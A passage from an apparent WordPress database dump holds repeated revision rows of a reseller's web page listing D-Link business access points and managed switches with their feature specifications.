srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:21:58','2019-09-25 06:21:58','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3388,1,'2019-09-25 14:23:16','2019-09-25 06:23:16','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:23:16','2019-09-25 06:23:16','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3389,1,'2019-09-25 14:23:40','2019-09-25 06:23:40','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 